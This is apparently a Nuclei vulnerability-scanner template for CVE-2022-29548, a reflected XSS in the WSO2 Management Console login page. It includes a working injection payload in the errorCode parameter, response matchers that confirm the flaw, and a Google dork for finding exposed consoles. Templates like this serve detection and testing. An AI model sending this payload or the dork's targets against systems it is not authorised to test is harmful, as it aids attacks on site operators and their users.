39 lines
1020 B
YAML
39 lines
1020 B
YAML
|
id: CVE-2022-29548
|
||
|
|
||
|
info:
|
||
|
name: WSO2 Management Console - Reflected XSS
|
||
|
author: edoardottt
|
||
|
severity: medium
|
||
|
description: A reflected XSS issue exists in the Management Console of several WSO2 products.
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.1
|
||
|
cve-id: CVE-2022-29548
|
||
|
cwe-id: CWE-79
|
||
|
reference:
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-29548
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548
|
||
|
tags: cve,cve2022,wso2,xss
|
||
|
metadata:
|
||
|
google-dork: inurl:"carbon/admin/login"
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- "text/html"
|
||
|
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "CARBON.showWarningDialog('???');alert(document.domain)//???"
|